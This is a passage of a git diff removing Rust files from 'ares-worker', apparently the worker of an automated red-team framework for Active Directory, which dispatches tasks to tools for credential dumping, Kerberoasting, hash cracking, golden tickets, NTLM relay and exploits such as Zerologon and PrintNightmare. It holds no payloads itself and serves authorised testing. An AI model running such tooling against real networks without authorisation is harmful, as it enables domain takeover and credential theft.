format!("{HEARTBEAT_PREFIX}:{agent_name}"); - let ttl_secs = ttl.as_secs() as i64; - - debug!("Heartbeat: writing to {heartbeat_key} every {interval:?}"); - - let mut ticker = tokio::time::interval(interval); - ticker.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); - - loop { - tokio::select! { - _ = ticker.tick() => {} - _ = shutdown.notified() => { - // Send a final "offline" heartbeat before exiting - let data = build_heartbeat_json("offline", None, &pod_name, &role, &operation_id); - let _: Result<(), _> = redis::cmd("SET") - .arg(&heartbeat_key) - .arg(&data) - .arg("EX") - .arg(ttl_secs) - .query_async(&mut conn) - .await; - debug!("Heartbeat: shutdown, sent offline heartbeat"); - return; - } - } - - let status = status_rx.borrow().clone(); - let data = build_heartbeat_json( - &status.status, - status.current_task.as_deref(), - &pod_name, - &role, - &operation_id, - ); - - match conn - .set_ex::<_, _, ()>(&heartbeat_key, &data, ttl_secs as u64) - .await - { - Ok(()) => { - debug!("Heartbeat: {agent_name} -> {}", status.status); - } - Err(e) => { - // ConnectionManager auto-reconnects on next use - warn!("Heartbeat: Redis write failed: {e}"); - } - } - } -} - -/// Build the heartbeat JSON payload matching Python's `send_heartbeat`. -fn build_heartbeat_json( - status: &str, - current_task: Option<&str>, - pod_name: &str, - role: &str, - operation_id: &Option, -) -> String { - serde_json::json!({ - "status": status, - "current_task": current_task, - "pod_name": pod_name, - "role": role, - "operation_id": operation_id, - "timestamp": Utc::now().to_rfc3339(), - }) - .to_string() -} diff --git a/ares-worker/src/hosts.rs b/ares-worker/src/hosts.rs deleted file mode 100644 index c021f2ed..00000000 --- a/ares-worker/src/hosts.rs +++ /dev/null @@ -1,238 +0,0 @@ -//! Background `/etc/hosts` management for AD hostname resolution. -//! -//! In Active Directory environments, Kerberos authentication requires hostname -//! resolution. Workers need to resolve DC names and other AD hosts. This module -//! periodically reads discovered hosts from Redis and appends new entries to -//! `/etc/hosts`. -//! -//! For domain controllers, the bare domain name is also added as an alias to -//! enable Kerberos realm resolution (e.g., `192.168.58.10 dc01.contoso.local dc01 contoso.local`). - -use std::collections::HashSet; -use std::sync::Arc; -use std::time::Duration; - -use redis::aio::ConnectionManager; -use redis::AsyncCommands; -use tracing::{debug, info, warn}; - -use ares_core::models::Host; - -/// Interval between host sync cycles. -const SYNC_INTERVAL: Duration = Duration::from_secs(30); - -/// Build the `/etc/hosts` entries for a list of discovered hosts. -/// -/// Returns `(entries, new_written_ips)` — the formatted lines and which IPs -/// were included (for dedup tracking). -pub fn build_host_entries(hosts: &[Host], already_written: &HashSet) -> Vec { - let mut entries = Vec::new(); - - for host in hosts { - if host.ip.is_empty() || host.hostname.is_empty() { - continue; - } - if already_written.contains(&host.ip) { - continue; - } - - let hostname = host.hostname.to_lowercase(); - let parts: Vec<&str> = hostname.split('.').collect(); - let short_name = parts.first().copied().unwrap_or(&hostname); - - // Build aliases: FQDN, short name, and bare domain for DCs - let mut aliases = vec![hostname.clone()]; - if short_name != hostname { - aliases.push(short_name.to_string()); - } - - // For domain controllers, add bare domain for Kerberos realm resolution - if host.is_dc && parts.len() >= 2 { - let domain = parts[1..].join("."); - if !domain.is_empty() { - aliases.push(domain); - } - } - - entries.push(format!("{} {}", host.ip, aliases.join(" "))); - } - - entries -} - -/// Write new host entries to `/etc/hosts`. -/// -/// Appends entries in a single write to minimize race conditions. -/// Returns the set of IPs that were successfully written. -fn write_etc_hosts(entries: &[String], agent_name: &str) -> HashSet { - use std::io::Write; - - let mut written = HashSet::new(); - - if entries.is_empty() { - return written; - } - - match std::fs::OpenOptions::new().append(true).open("/etc/hosts") { - Ok(mut f) => { - let mut buf = format!("\n# Ares discovered hosts ({agent_name})\n"); - for entry in entries { - buf.push_str(entry); - buf.push('\n'); - // Extract IP from "IP hostname ..." format - if let Some(ip) = entry.split_whitespace().next() { - written.insert(ip.to_string()); - } - } - if let Err(e) = f.write_all(buf.as_bytes()) { - warn!("Cannot write to /etc/hosts: {e}"); - return HashSet::new(); - } - info!( - count = entries.len(), - agent = agent_name, - "Updated /etc/hosts" - ); - for entry in entries { - debug!("Added hosts entry: {entry}"); - } - } - Err(e) => { - warn!("Cannot open /etc/hosts for append: {e}"); - } - } - - written -} - -/// Spawn a background task that periodically syncs hosts from Redis to `/etc/hosts`. -/// -/// Requires an operation ID to know which Redis key to read from. -/// Returns the join handle. -pub fn spawn_hosts_sync( - conn: ConnectionManager, - operation_id: String, - agent_name: String, - shutdown: Arc, -) -> tokio::task::JoinHandle<()> { - tokio::spawn(async move { - let mut conn = conn; - let mut written_ips: HashSet = HashSet::new(); - - let hosts_key = format!("ares:op:{operation_id}:hosts"); - info!(key = %hosts_key, "Starting /etc/hosts sync background task"); - - loop { - tokio::select! { - _ = tokio::time::sleep(SYNC_INTERVAL) => {} - _ = shutdown.notified() => { - debug!("hosts_sync: shutdown signalled"); - return; - } - } - - // Read hosts from Redis - let hosts_json: Vec = match conn.lrange(&hosts_key, 0, -1).await { - Ok(h) => h, - Err(e) => { - debug!("hosts_sync: Redis read failed: {e}"); - continue; - } - }; - - let hosts: Vec = hosts_json - .iter() - .filter_map(|json| serde_json::from_str(json).ok()) - .collect(); - - let entries = build_host_entries(&hosts, &written_ips); - if !entries.is_empty() { - let newly_written = write_etc_hosts(&entries, &agent_name); - written_ips.extend(newly_written); - } - } - }) -} - -// ─── Tests ────────────────────────────────────────────────────────────────── - -#[cfg(test)] -mod tests { - use super::*; - - fn make_host(ip: &str, hostname: &str, is_dc: bool) -> Host { - Host { - ip: ip.to_string(), - hostname: hostname.to_string(), - os: String::new(), - roles: Vec::new(), - services: Vec::new(), - is_dc, - owned: false, - } - } - - #[test] - fn test_build_host_entries_basic() { - let hosts = vec![ - make_host("192.168.58.10", "dc01.contoso.local", true), - make_host("192.168.58.22", "ws01.contoso.local", false), - ]; - let entries = build_host_entries(&hosts, &HashSet::new()); - assert_eq!(entries.len(), 2); - // DC entry should have FQDN, short name, and domain - assert_eq!( - entries[0], - "192.168.58.10 dc01.contoso.local dc01 contoso.local" - ); - // Non-DC entry should have FQDN and short name only - assert_eq!(entries[1], "192.168.58.22 ws01.contoso.local ws01"); - } - - #[test] - fn test_build_host_entries_dedup() { - let hosts = vec![make_host("192.168.58.10", "dc01.contoso.local", true)]; - let mut already_written = HashSet::new(); - already_written.insert("192.168.58.10".to_string()); - let entries = build_host_entries(&hosts, &already_written); - assert!(entries.is_empty()); // Already written - } - - #[test] - fn test_build_host_entries_skip_incomplete() { - let hosts = vec![ - make_host("", "dc01.contoso.local", true), - make_host("192.168.58.10", "", true), - ]; - let entries = build_host_entries(&hosts, &HashSet::new()); - assert!(entries.is_empty()); // Both missing required fields - } - - #[test] - fn test_build_host_entries_short_hostname() { - let hosts = vec![make_host("192.168.58.99", "fileserver", false)]; - let entries = build_host_entries(&hosts, &HashSet::new()); - assert_eq!(entries.len(), 1); - // Short hostname without domain — no alias needed - assert_eq!(entries[0], "192.168.58.99 fileserver"); - } - - #[test] - fn test_build_host_entries_dc_subdomain() { - let hosts = vec![make_host("192.168.58.15", "dc02.north.contoso.local", true)]; - let entries = build_host_entries(&hosts, &HashSet::new()); - assert_eq!(entries.len(), 1); - assert_eq!( - entries[0], - "192.168.58.15 dc02.north.contoso.local dc02 north.contoso.local" - ); - } - - #[test] - fn test_build_host_entries_lowercase() { - let hosts = vec![make_host("192.168.58.10", "DC01.CONTOSO.LOCAL", true)]; - let entries = build_host_entries(&hosts, &HashSet::new()); - assert_eq!(entries.len(), 1); - assert!(entries[0].contains("dc01.contoso.local")); // Lowercased - } -} diff --git a/ares-worker/src/main.rs b/ares-worker/src/main.rs deleted file mode 100644 index 33e2fde5..00000000 --- a/ares-worker/src/main.rs +++ /dev/null @@ -1,161 +0,0 @@ -//! Ares Worker — the Rust binary that runs on worker pods. -//! -//! Owns the task consumption loop: -//! 1. BLPOP from Redis queue (`ares:tasks:{role}`) -//! 2. Execute agent tasks (native Rust tool execution) -//! 3. Push results back (`ares:results:{task_id}`) -//! -//! Heartbeat runs on a separate tokio task. -//! Graceful shutdown: finish current task before exiting on SIGTERM. - -#[cfg(feature = "blue")] -mod blue_task_loop; -mod config; -mod heartbeat; -mod hosts; -mod task_loop; -mod tool_check; -mod tool_executor; - -use std::sync::Arc; - -use tracing::{error, info}; - -#[tokio::main] -async fn main() -> anyhow::Result<()> { - // Initialize telemetry (console + OTLP when endpoint is configured) - let _telemetry = ares_core::telemetry::init_telemetry( - ares_core::telemetry::TelemetryConfig::new("ares-worker"), - ); - - // Parse config from environment - let config = config::WorkerConfig::from_env()?; - let mode_str = match config.mode { - config::WorkerMode::Task => "task", - config::WorkerMode::ToolExec => "tool_exec", - #[cfg(feature = "blue")] - config::WorkerMode::BlueTask => "blue_task", - }; - info!( - agent = %config.agent_name, - role = %config.worker_role, - mode = mode_str, - pod = %config.pod_name, - operation_id = ?config.operation_id, - task_timeout_secs = config.task_timeout.as_secs(), - "Ares worker starting" - ); - - // Single shared Redis connection — cloned cheaply to all subsystems - // Default response_timeout is 500ms which is too short for BRPOP - // blocking calls (5s+). Without this, the client-side timeout cancels - // the future but the server-side BRPOP remains, consuming queue items - // that get silently dropped. - let redis_client = redis::Client::open(config.redis_url.as_str())?; - let cm_config = redis::aio::ConnectionManagerConfig::new() - .set_response_timeout(Some(std::time::Duration::from_secs(30))); - let conn = redis_client - .get_connection_manager_with_config(cm_config) - .await?; - - // Shared shutdown signal - let shutdown = Arc::new(tokio::sync::Notify::new()); - let shutdown_signal = Arc::clone(&shutdown); - - // Spawn background heartbeat - let (_heartbeat_handle, status_tx) = heartbeat::spawn_heartbeat( - conn.clone(), - config.agent_name.clone(), - config.pod_name.clone(), - config.worker_role.clone(), - config.operation_id.clone(), - config.heartbeat_interval, - config.heartbeat_ttl, - Arc::clone(&shutdown), - ); - - // Check tool availability for this role and publish inventory - let inventory = tool_check::check_tools(&config.worker_role).await; - tool_check::publish_inventory(&mut conn.clone(), &config.agent_name, &inventory).await; - - // Spawn /etc/hosts sync if we have an operation ID - let _hosts_handle = config.operation_id.as_ref().map(|op_id| { - hosts::spawn_hosts_sync( - conn.clone(), - op_id.clone(), - config.agent_name.clone(), - Arc::clone(&shutdown), - ) - }); - - // Spawn SIGTERM/SIGINT handler - let shutdown_for_signal = Arc::clone(&shutdown_signal); - tokio::spawn(async move { - wait_for_shutdown_signal().await; - info!("Shutdown signal received, draining..."); - shutdown_for_signal.notify_waiters(); - }); - - // Run the appropriate loop based on worker mode - let result = match config.mode { - config::WorkerMode::Task => { - task_loop::run_task_loop(&config, conn, status_tx, shutdown_signal).await - } - config::WorkerMode::ToolExec => { - tool_executor::run_tool_exec_loop(&config, conn, status_tx, shutdown_signal).await - } - #[cfg(feature = "blue")] - config::WorkerMode::BlueTask => { - // Blue team mode requires an LLM provider - let model_spec = std::env::var("ARES_LLM_MODEL") - .unwrap_or_else(|_| "anthropic/claude-sonnet-4-20250514".to_string()); - let (provider, model_name) = match ares_llm::create_provider(&model_spec) { - Ok(p) => p, - Err(e) => { - error!("Failed to create LLM provider for blue worker: {e}"); - return Err(e); - } - }; - let dispatcher = std::sync::Arc::new(blue_task_loop::BlueLocalToolDispatcher::new()); - info!(model = %model_name, "Blue team worker using LLM"); - blue_task_loop::run_blue_task_loop( - &config, - conn, - provider, - dispatcher, - model_name, - status_tx, - shutdown_signal, - ) - .await - } - }; - - match &result { - Ok(()) => info!("Ares worker shut down cleanly"), - Err(e) => error!("Ares worker exited with error: {e}"), - } - - result -} - -/// Wait for SIGTERM or SIGINT (Ctrl-C). -async fn wait_for_shutdown_signal() { - #[cfg(unix)] - { - use tokio::signal::unix::{signal, SignalKind}; - let mut sigterm = signal(SignalKind::terminate()).expect("failed to register SIGTERM"); - let mut sigint = signal(SignalKind::interrupt()).expect("failed to register SIGINT"); - tokio::select! { - _ = sigterm.recv() => info!("Received SIGTERM"), - _ = sigint.recv() => info!("Received SIGINT"), - } - } - #[cfg(not(unix))] - { - tokio::signal::ctrl_c() - .await - .expect("failed to register Ctrl-C handler"); - info!("Received Ctrl-C"); - } -} diff --git a/ares-worker/src/task_loop/executor.rs b/ares-worker/src/task_loop/executor.rs deleted file mode 100644 index c70ef0c5..00000000 --- a/ares-worker/src/task_loop/executor.rs +++ /dev/null @@ -1,415 +0,0 @@ -//! Task execution — run_agent_task dispatches to ares-tools. -//! -//! The orchestrator submits high-level composite task types (e.g. "recon", -//! "credential_access") with a `technique`/`techniques` field in the payload. -//! This module expands those into individual tool calls that `ares_tools::dispatch` -//! understands, then parses the raw output into structured discoveries. - -use std::time::Duration; - -use serde_json::Value; -use tracing::{info, warn}; - -use super::types::AgentResult; - -/// Execute a tool natively in Rust via ares-tools. -/// -/// First attempts direct dispatch by `task_type`. If the task type is a -/// composite type (recon, credential_access, etc.), expands it into individual -/// tool calls based on the `technique`/`techniques` payload field. -/// -/// Tool outputs are parsed to extract structured discoveries (hosts, -/// credentials, hashes, vulnerabilities) that the orchestrator can consume. -pub async fn run_agent_task( - task_type: &str, - params: &serde_json::Value, - _timeout: Duration, -) -> anyhow::Result { - // Try expanding composite task types first - let tools = expand_task(task_type, params); - - if tools.is_empty() { - // Direct tool dispatch (task_type IS the tool name) - info!(tool = task_type, "Executing tool natively"); - let output = ares_tools::dispatch(task_type, params).await?; - let raw = output.combined_raw(); - let discoveries = ares_tools::parsers::parse_tool_output(task_type, &raw, params); - return Ok(make_result_with_discoveries(output, discoveries)); - } - - // Run each expanded tool, collecting outputs and discoveries - let mut outputs = Vec::new(); - let mut all_discoveries = Vec::new(); - let mut any_error = false; - - for (tool_name, tool_params) in &tools { - info!(tool = %tool_name, parent_task = task_type, "Executing expanded tool"); - match ares_tools::dispatch(tool_name, tool_params).await { - Ok(output) => { - if !output.success { - any_error = true; - } - let raw = output.combined_raw(); - let combined = output.combined(); - let disc = ares_tools::parsers::parse_tool_output(tool_name, &raw, tool_params); - all_discoveries.push(disc); - outputs.push(format!("=== {} ===\n{}", tool_name, combined)); - } - Err(e) => { - warn!(tool = %tool_name, err = %e, "Expanded tool failed"); - any_error = true; - outputs.push(format!("=== {} ===\nERROR: {}", tool_name, e)); - } - } - } - - let combined = outputs.join("\n\n"); - let discoveries = ares_tools::parsers::merge_discoveries(&all_discoveries); - let error = if any_error { - Some("one or more tools had errors".to_string()) - } else { - None - }; - - Ok(AgentResult { - output: combined, - error, - usage: None, - discoveries: Some(discoveries), - }) -} - -fn make_result_with_discoveries(output: ares_tools::ToolOutput, discoveries: Value) -> AgentResult { - let combined = output.combined(); - let error = if output.success { - None - } else { - Some(format!("tool exited with code {:?}", output.exit_code)) - }; - AgentResult { - output: combined, - error, - usage: None, - discoveries: if discoveries.as_object().is_none_or(|o| o.is_empty()) { - None - } else { - Some(discoveries) - }, - } -} - -/// Expand a composite task type into individual (tool_name, params) pairs. -/// -/// Returns an empty vec if the task_type is already a concrete tool name. -fn expand_task(task_type: &str, params: &serde_json::Value) -> Vec<(String, serde_json::Value)> { - match task_type { - "recon" | "credential_access" | "privesc_enumeration" | "lateral_movement" | "coercion" => { - expand_technique_task(params) - } - "crack" => expand_crack_task(params), - "exploit" => expand_exploit_task(params), - // Already a concrete tool name — handled by direct dispatch - _ => Vec::new(), - } -} - -/// Expand tasks that have `technique` (singular) or `techniques` (array) fields. -fn expand_technique_task(params: &serde_json::Value) -> Vec<(String, serde_json::Value)> { - let mut tools = Vec::new(); - let normalized = normalize_params(params); - - // Handle singular "technique" field - if let Some(technique) = params.get("technique").and_then(|v| v.as_str()) { - let tool_name = map_technique_to_tool(technique); - tools.push((tool_name, normalized.clone())); - return tools; - } - - // Handle "techniques" array - if let Some(techniques) = params.get("techniques").and_then(|v| v.as_array()) { - for tech in techniques { - if let Some(name) = tech.as_str() { - let tool_name = map_technique_to_tool(name); - tools.push((tool_name, normalized.clone())); - } - } - } - - tools -} - -/// Normalize orchestrator payload field names to what ares-tools expects. -/// -/// The orchestrator sends `target_ip` but tools expect `target`. -/// Credential objects are flattened into top-level fields. -fn normalize_params(params: &serde_json::Value) -> serde_json::Value { - let mut p = params.clone(); - if let Some(obj) = p.as_object_mut() { - // target_ip → target (tools expect "target") - if !obj.contains_key("target") { - if let Some(ip) = obj.get("target_ip").cloned() { - obj.insert("target".to_string(), ip); - } - } - // Also set "targets" for tools that want it (smb_sweep) - if !obj.contains_key("targets") { - if let Some(ip) = obj.get("target_ip").cloned() { - obj.insert("targets".to_string(), ip); - } - } - // Flatten credential object into top-level fields - if let Some(cred) = obj.get("credential").cloned() { - if let Some(cred_obj) = cred.as_object() { - for (k, v) in cred_obj { - if !obj.contains_key(k) { - obj.insert(k.clone(), v.clone()); - } - } - } - } - } - p -} - -/// Map technique names (from orchestrator payloads) to ares-tools dispatch names. -fn map_technique_to_tool(technique: &str) -> String { - match technique { - // Recon technique → tool mappings - "network_scan" => "nmap_scan".to_string(), - "user_enumeration" => "enumerate_users".to_string(), - "share_enumeration" => "enumerate_shares".to_string(), - "smb_enumeration" => "smb_sweep".to_string(), - "bloodhound_collect" => "run_bloodhound".to_string(), - "trust_enumeration" => "enumerate_domain_trusts".to_string(), - - // Credential access technique → tool mappings - "share_spider" => "smbclient_spider".to_string(), - "asrep_roast" | "asrep" => "asrep_roast".to_string(), - - // Most technique names already match tool names 1:1 - other => other.to_string(), - } -} - -/// Expand crack tasks to the appropriate cracking tool. -fn expand_crack_task(params: &serde_json::Value) -> Vec<(String, serde_json::Value)> { - let normalized = normalize_params(params); - let tool = if params - .get("use_john") - .and_then(|v| v.as_bool()) - .unwrap_or(false) - { - "crack_with_john" - } else { - "crack_with_hashcat" - }; - vec![(tool.to_string(), normalized)] -} - -/// Expand exploit tasks based on vuln_type. -fn expand_exploit_task(params: &serde_json::Value) -> Vec<(String, serde_json::Value)> { - let vuln_type = params - .get("vuln_type") - .and_then(|v| v.as_str()) - .unwrap_or(""); - - let tool = match vuln_type { - "constrained_delegation" | "unconstrained_delegation" => "s4u_attack", - "esc1" | "adcs_esc1" => "certipy_request", - "esc4" | "adcs_esc4" => "certipy_esc4_full_chain", - "esc8" | "adcs_esc8" => "ntlmrelayx_to_adcs", - "krbtgt_hash" => "generate_golden_ticket", - "rbcd" => "rbcd_write", - "nopac" | "samaccountname" => "nopac", - "printnightmare" => "printnightmare", - "zerologon" => "zerologon_check", - "krbrelayup" => "krbrelayup", - "mssql_access" => "mssql_enum_impersonation", - _ => { - warn!(vuln_type, "No tool mapping for exploit vuln_type"); - return Vec::new(); - } - }; - - vec![(tool.to_string(), normalize_params(params))] -} - -#[cfg(test)] -mod tests { - use super::*; - use serde_json::json; - - // --- normalize_params --- - - #[test] - fn test_normalize_params_target_ip_to_target() { - let params = json!({"target_ip": "192.168.58.10"}); - let norm = normalize_params(¶ms); - assert_eq!(norm["target"], "192.168.58.10"); - assert_eq!(norm["targets"], "192.168.58.10"); - // Original field preserved - assert_eq!(norm["target_ip"], "192.168.58.10"); - } - - #[test] - fn test_normalize_params_existing_target_not_overwritten() { - let params = json!({"target": "192.168.58.10", "target_ip": "192.168.58.20"}); - let norm = normalize_params(¶ms); - assert_eq!(norm["target"], "192.168.58.10"); // not overwritten - } - - #[test] - fn test_normalize_params_credential_flattening() { - let params = json!({ - "target_ip": "192.168.58.10", - "credential": { - "username": "admin", - "password": "P@ss1", - "domain": "contoso.local" - } - }); - let norm = normalize_params(¶ms); - assert_eq!(norm["username"], "admin"); - assert_eq!(norm["password"], "P@ss1"); - assert_eq!(norm["domain"], "contoso.local"); - } - - #[test] - fn test_normalize_params_existing_fields_not_overwritten_by_cred() { - let params = json!({ - "domain": "fabrikam.local", - "credential": { - "domain": "contoso.local", - "username": "admin", - "password": "pass" - } - }); - let norm = normalize_params(¶ms); - assert_eq!(norm["domain"], "fabrikam.local"); // not overwritten - } - - // --- map_technique_to_tool --- - - #[test] - fn test_map_technique_to_tool_mapped() { - assert_eq!(map_technique_to_tool("network_scan"), "nmap_scan"); - assert_eq!(map_technique_to_tool("user_enumeration"), "enumerate_users"); - assert_eq!( - map_technique_to_tool("share_enumeration"), - "enumerate_shares" - ); - assert_eq!(map_technique_to_tool("smb_enumeration"), "smb_sweep"); - assert_eq!( - map_technique_to_tool("bloodhound_collect"), - "run_bloodhound" - ); - assert_eq!( - map_technique_to_tool("trust_enumeration"), - "enumerate_domain_trusts" - ); - assert_eq!(map_technique_to_tool("share_spider"), "smbclient_spider"); - assert_eq!(map_technique_to_tool("asrep_roast"), "asrep_roast"); - assert_eq!(map_technique_to_tool("asrep"), "asrep_roast"); - } - - #[test] - fn test_map_technique_to_tool_passthrough() { - assert_eq!(map_technique_to_tool("nmap_scan"), "nmap_scan"); - assert_eq!(map_technique_to_tool("secretsdump"), "secretsdump"); - assert_eq!(map_technique_to_tool("kerberoast"), "kerberoast"); - } - - // --- expand_task --- - - #[test] - fn test_expand_task_recon_with_techniques() { - let params = json!({"techniques": ["network_scan", "user_enumeration"], "target_ip": "192.168.58.10"}); - let tools = expand_task("recon", ¶ms); - assert_eq!(tools.len(), 2); - assert_eq!(tools[0].0, "nmap_scan"); - assert_eq!(tools[1].0, "enumerate_users"); - // Params should be normalized - assert_eq!(tools[0].1["target"], "192.168.58.10"); - } - - #[test] - fn test_expand_task_credential_access_single_technique() { - let params = json!({"technique": "secretsdump", "target_ip": "192.168.58.10"}); - let tools = expand_task("credential_access", ¶ms); - assert_eq!(tools.len(), 1); - assert_eq!(tools[0].0, "secretsdump"); - } - - #[test] - fn test_expand_task_concrete_tool_returns_empty() { - let params = json!({"target": "192.168.58.10"}); - let tools = expand_task("nmap_scan", ¶ms); - assert!(tools.is_empty()); - } - - // --- expand_crack_task --- - - #[test] - fn test_expand_crack_task_default_hashcat() { - let params = json!({"hash_value": "abc123", "hash_type": "ntlm"}); - let tools = expand_crack_task(¶ms); - assert_eq!(tools.len(), 1); - assert_eq!(tools[0].0, "crack_with_hashcat"); - } - - #[test] - fn test_expand_crack_task_john() { - let params = json!({"hash_value": "abc123", "use_john": true}); - let tools = expand_crack_task(¶ms); - assert_eq!(tools[0].0, "crack_with_john"); - } - - // --- expand_exploit_task --- - - #[test] - fn test_expand_exploit_delegation() { - let params = json!({"vuln_type": "constrained_delegation", "target_ip": "192.168.58.10"}); - let tools = expand_exploit_task(¶ms); - assert_eq!(tools.len(), 1); - assert_eq!(tools[0].0, "s4u_attack"); - } - - #[test] - fn test_expand_exploit_adcs_variants() { - for (vuln_type, expected_tool) in &[ - ("esc1", "certipy_request"), - ("adcs_esc1", "certipy_request"), - ("esc4", "certipy_esc4_full_chain"), - ("esc8", "ntlmrelayx_to_adcs"), - ] { - let params = json!({"vuln_type": vuln_type}); - let tools = expand_exploit_task(¶ms); - assert_eq!( - tools[0].0, *expected_tool, - "Failed for vuln_type: {vuln_type}" - ); - } - } - - #[test] - fn test_expand_exploit_other_types() { - for (vuln_type, expected) in &[ - ("krbtgt_hash", "generate_golden_ticket"), - ("rbcd", "rbcd_write"), - ("nopac", "nopac"), - ("zerologon", "zerologon_check"), - ("mssql_access", "mssql_enum_impersonation"), - ] { - let params = json!({"vuln_type": vuln_type}); - let tools = expand_exploit_task(¶ms); - assert_eq!(tools[0].0, *expected, "Failed for vuln_type: {vuln_type}"); - } - } - - #[test] - fn test_expand_exploit_unknown_type_empty() { - let params = json!({"vuln_type": "unknown_vuln"}); - let tools = expand_exploit_task(¶ms); - assert!(tools.is_empty()); - } -} diff --git a/ares-worker/src/task_loop/mod.rs b/ares-worker/src/task_loop/mod.rs deleted file mode 100644 index e59e344e..00000000 --- a/ares-worker/src/task_loop/mod.rs +++ /dev/null @@ -1,236 +0,0 @@ -//! Core task consumption loop. -//! -//! ```text -//! loop { -//! 1. BRPOP from ares:tasks:{role} -//! 2. Deserialize TaskMessage -//! 3. Update task status to "running" -//! 4. Execute agent task (native Rust) -//! 5. Parse result -//! 6. Serialize TaskResult -//! 7. LPUSH to ares:results:{task_id} -//! 8. Update task status to "completed" or "failed" -//! 9. Refresh heartbeat status -//! } -//! ``` - -mod executor; -mod result_handler; -pub mod types; - -use types::TaskMessage; - -use std::sync::Arc; -use std::time::Duration; - -use tracing::{debug, error, info, warn}; - -use crate::config::WorkerConfig; -use crate::heartbeat::WorkerStatus; - -// ─── Redis key prefixes (must match Python's RedisTaskQueue) ───────────────── - -const TASK_QUEUE_PREFIX: &str = "ares:tasks"; -const RESULT_QUEUE_PREFIX: &str = "ares:results"; -const TASK_STATUS_PREFIX: &str = "ares:task_status"; - -/// TTL for task status keys — 24 hours, matches Python. -const TASK_STATUS_TTL: i64 = 60 * 60 * 24; - -/// TTL for result keys — 24 hours, matches Python's `RESULT_TTL`. -const RESULT_TTL: i64 = 60 * 60 * 24; - -// ─── Task loop ─────────────────────────────────────────────────────────────── - -/// Run the main task consumption loop until shutdown is signalled. -pub async fn run_task_loop( - config: &WorkerConfig, - conn: redis::aio::ConnectionManager, - status_tx: tokio::sync::watch::Sender, - shutdown: Arc, -) -> anyhow::Result<()> { - let queue_key = format!("{TASK_QUEUE_PREFIX}:{}", config.worker_role); - info!( - queue = %queue_key, - agent = %config.agent_name, - "Starting task loop" - ); - - let mut conn = conn; - - // Exponential backoff state for connection errors - let mut retry_delay = Duration::from_secs(1); - let max_retry_delay = Duration::from_secs(60); - - loop { - // Race BRPOP against shutdown signal - let poll_result = tokio::select! { - result = poll_task(&mut conn, &queue_key, config.poll_timeout) => result, - _ = shutdown.notified() => { - info!("Task loop: shutdown signalled, finishing"); - break; - } - }; - - match poll_result { - Ok(Some(task)) => { - // Reset backoff on successful poll - retry_delay = Duration::from_secs(1); - - // Update heartbeat status to busy - let _ = status_tx.send(WorkerStatus { - status: "busy".to_string(), - current_task: Some(task.task_id.clone()), - }); - - // Execute the task — runs to completion even if shutdown arrives mid-task - result_handler::process_task(&mut conn, config, &task).await; - - // Update heartbeat status back to idle - let _ = status_tx.send(WorkerStatus { - status: "idle".to_string(), - current_task: None, - }); - } - Ok(None) => { - // No task available (BRPOP timeout), just loop - retry_delay = Duration::from_secs(1); - } - Err(e) => { - let error_str = e.to_string().to_lowercase(); - let is_conn_error = [ - "connection", - "connect", - "closed", - "timeout", - "broken pipe", - "reset", - ] - .iter() - .any(|kw| error_str.contains(kw)); - - if is_conn_error { - // ConnectionManager auto-reconnects; just back off before retrying - warn!( - delay_secs = retry_delay.as_secs(), - "Task loop: connection error, retrying: {e}" - ); - tokio::select! { - _ = tokio::time::sleep(retry_delay) => {} - _ = shutdown.notified() => break, - } - retry_delay = (retry_delay * 2).min(max_retry_delay); - } else { - error!("Task loop: non-connection error: {e}"); - tokio::select! { - _ = tokio::time::sleep(Duration::from_secs(5)) => {} - _ = shutdown.notified() => break, - } - retry_delay = Duration::from_secs(1); - } - } - } - } - - Ok(()) -} - -/// BRPOP from the task queue with timeout. -/// Returns `Ok(None)` on timeout (no task available). -async fn poll_task( - conn: &mut redis::aio::ConnectionManager, - queue_key: &str, - timeout: Duration, -) -> anyhow::Result> { - // BRPOP returns Option<(key, value)> - let result: Option<(String, String)> = redis::cmd("BRPOP") - .arg(queue_key) - .arg(timeout.as_secs() as i64) - .query_async(conn) - .await?; - - match result { - Some((_key, data)) => { - let task: TaskMessage = serde_json::from_str(&data)?; - debug!(task_id = %task.task_id, task_type = %task.task_type, "Received task"); - Ok(Some(task)) - } - None => Ok(None), - } -} - -#[cfg(test)] -mod tests { - use super::*; - use types::TaskResult; - - #[test] - fn task_message_roundtrip() { - let msg = TaskMessage { - task_id: "task-123".into(), - task_type: "recon".into(), - source_agent: "orchestrator".into(), - target_agent: "ares-recon-0".into(), - payload: serde_json::json!({"target_ip": "192.168.58.1"}), - priority: 3, - created_at: Some("2026-04-07T10:00:00Z".into()), - callback_queue: None, - }; - let json = serde_json::to_string(&msg).unwrap(); - let msg2: TaskMessage = serde_json::from_str(&json).unwrap(); - assert_eq!(msg.task_id, msg2.task_id); - assert_eq!(msg.task_type, msg2.task_type); - assert_eq!(msg.priority, msg2.priority); - } - - #[test] - fn task_message_default_priority() { - let json = r#"{ - "task_id": "t1", - "task_type": "recon", - "source_agent": "orch", - "target_agent": "recon-0", - "payload": {} - }"#; - let msg: TaskMessage = serde_json::from_str(json).unwrap(); - assert_eq!(msg.priority, 5); // default - } - - #[test] - fn task_result_success() { - let r = TaskResult::success( - "t1", - serde_json::json!({"output": "done"}), - "pod-0", - "ares-recon", - ); - assert!(r.success); - assert!(r.error.is_none()); - assert!(r.result.is_some()); - assert!(r.completed_at.is_some()); - assert_eq!(r.worker_pod.as_deref(), Some("pod-0")); - } - - #[test] - fn task_result_failure() { - let r = TaskResult::failure("t1", "timeout".into(), None, "pod-0", "ares-recon"); - assert!(!r.success); - assert_eq!(r.error.as_deref(), Some("timeout")); - assert!(r.result.is_none()); - } - - #[test] - fn task_result_skip_serializing_none() { - let r = TaskResult::success("t1", serde_json::json!("ok"), "pod", "agent"); - let json = serde_json::to_string(&r).unwrap(); - // error field should be absent (skip_serializing_if = "Option::is_none") - assert!(!json.contains("\"error\"")); - } - - #[test] - fn redis_key_prefixes() { - assert_eq!(TASK_QUEUE_PREFIX, "ares:tasks"); - assert_eq!(RESULT_QUEUE_PREFIX, "ares:results"); - assert_eq!(TASK_STATUS_PREFIX, "ares:task_status"); - } -} diff --git a/ares-worker/src/task_loop/result_handler.rs b/ares-worker/src/task_loop/result_handler.rs deleted file mode 100644 index 62b7a6ca..00000000 --- a/ares-worker/src/task_loop/result_handler.rs +++ /dev/null @@ -1,215 +0,0 @@ -//! Result processing — build TaskResult, push to Redis, track token usage. - -use chrono::Utc; -use redis::AsyncCommands; -use tracing::{debug, error, info, warn}; - -use ares_core::token_usage; - -use crate::config::WorkerConfig; - -use super::executor::run_agent_task; -use super::types::{TaskMessage, 